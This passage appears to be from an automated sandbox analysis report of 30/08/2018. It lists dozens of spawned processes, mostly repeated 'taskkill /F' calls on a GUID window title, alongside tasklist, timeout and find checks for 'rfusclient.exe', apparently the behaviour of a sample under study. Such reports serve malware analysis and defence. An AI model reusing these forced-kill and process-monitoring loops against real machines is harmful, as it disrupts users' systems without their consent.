Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x440000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2748 Parent PID: 2948

General

Start time:	10:35:11
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xe30000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2124 Parent PID: 2948

General

Start time:	10:35:11
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x47f80000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2692 Parent PID: 2948

General

Start time:	10:35:12
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x1c0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 2244 Parent PID: 1032

General

Start time:	10:35:12
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:	0xdf0000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2404 Parent PID: 2948

General

Start time:	10:35:12
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x9e0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 2112 Parent PID: 1032

General

Start time:	10:35:12
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:	0x310000
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2320 Parent PID: 2948

General

Start time:	10:35:13
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x660000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2864 Parent PID: 2948

General

Start time:	10:35:13
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xd70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2372 Parent PID: 2948

General

Start time:	10:35:14
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xf0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2444 Parent PID: 2948

General

Start time:	10:35:14
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x9c0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 2832 Parent PID: 1032

General

Start time:	10:35:14
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3 /nobreak
Imagebase:	0xb70000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1540 Parent PID: 2948

General

Start time:	10:35:15
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xdb0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2472 Parent PID: 2948

General

Start time:	10:35:15
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x720000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3080 Parent PID: 2948

General

Start time:	10:35:16
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x5f0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2660 Parent PID: 2948

General

Start time:	10:35:16
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x380000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 776 Parent PID: 2948

General

Start time:	10:35:17
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x760000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2628 Parent PID: 2948

General

Start time:	10:35:17
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x380000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3308 Parent PID: 2948

General

Start time:	10:35:17
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x200000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2060 Parent PID: 2948

General

Start time:	10:35:18
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x3d0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 2256 Parent PID: 1032

General

Start time:	10:35:18
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:	0xe0000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 1152 Parent PID: 1032

General

Start time:	10:35:18
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:	0x940000
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 636 Parent PID: 2948

General

Start time:	10:35:19
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xaf0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 768 Parent PID: 2948

General

Start time:	10:35:19
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x870000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3312 Parent PID: 2948

General

Start time:	10:35:20
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x660000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3372 Parent PID: 2948

General

Start time:	10:35:20
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xcf0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1580 Parent PID: 2948

General

Start time:	10:35:21
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x230000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 3432 Parent PID: 1032

General

Start time:	10:35:21
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3 /nobreak
Imagebase:	0x9a0000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1504 Parent PID: 2948

General

Start time:	10:35:21
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x7a0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3216 Parent PID: 2948

General

Start time:	10:35:21
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x9d0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3540 Parent PID: 2948

General

Start time:	10:35:22
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xcb0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3536 Parent PID: 2948

General

Start time:	10:35:22
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xfb0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3672 Parent PID: 2948

General

Start time:	10:35:23
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xc80000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1920 Parent PID: 2948

General

Start time:	10:35:23
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xd00000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3768 Parent PID: 2948

General

Start time:	10:35:23
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xd60000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3668 Parent PID: 2948

General

Start time:	10:35:24
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x280000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 2984 Parent PID: 1032

General

Start time:	10:35:24
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:	0xd80000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 3040 Parent PID: 1032

General

Start time:	10:35:24
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:	0x7e0000
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1672 Parent PID: 2948

General

Start time:	10:35:24
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x5c0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3816 Parent PID: 2948

General

Start time:	10:35:25
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x5f0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 436 Parent PID: 2948

General

Start time:	10:35:25
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x370000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3136 Parent PID: 2948

General

Start time:	10:35:26
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xcd0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3844 Parent PID: 2948

General

Start time:	10:35:26
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xa40000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 3444 Parent PID: 1032

General

Start time:	10:35:26
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3 /nobreak
Imagebase:	0x880000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2804 Parent PID: 2948

General

Start time:	10:35:27
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xeb0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3888 Parent PID: 2948

General

Start time:	10:35:27
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x1e0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3936 Parent PID: 2948

General

Start time:	10:35:27
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x540000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2932 Parent PID: 2948

General

Start time:	10:35:28
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x2e0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1876 Parent PID: 2948

General

Start time:	10:35:28
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xf10000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 256 Parent PID: 2948

General

Start time:	10:35:29
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x6c0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2464 Parent PID: 2948

General

Start time:	10:35:29
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x8c0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2264 Parent PID: 2948

General

Start time:	10:35:29
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xd40000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3568 Parent PID: 2948

General

Start time:	10:35:30
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x9c0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 4060 Parent PID: 2948

General

Start time:	10:35:30
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xe90000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 2668 Parent PID: 1032

General

Start time:	10:35:30
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:	0x410000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 2484 Parent PID: 1032

General

Start time:	10:35:30
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:	0xf60000
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2524 Parent PID: 2948

General

Start time:	10:35:31
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xe70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2140 Parent PID: 2948

General

Start time:	10:35:31
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x530000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 480 Parent PID: 2948

General

Start time:	10:35:32
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xc20000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3252 Parent PID: 2948

General

Start time:	10:35:32
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x470000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 2392 Parent PID: 1032

General

Start time:	10:35:33
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3 /nobreak
Imagebase:	0xc10000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2064 Parent PID: 2948

General

Start time:	10:35:33
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xec0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2492 Parent PID: 2948

General

Start time:	10:35:33
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xd80000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2420 Parent PID: 2948

General

Start time:	10:35:34
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xaa0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3704 Parent PID: 2948

General

Start time:	10:35:34
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xbe0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1060 Parent PID: 2948

General

Start time:	10:35:34
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x170000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2776 Parent PID: 2948

General

Start time:	10:35:35
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xd20000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2056 Parent PID: 2948

General

Start time:	10:35:35
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
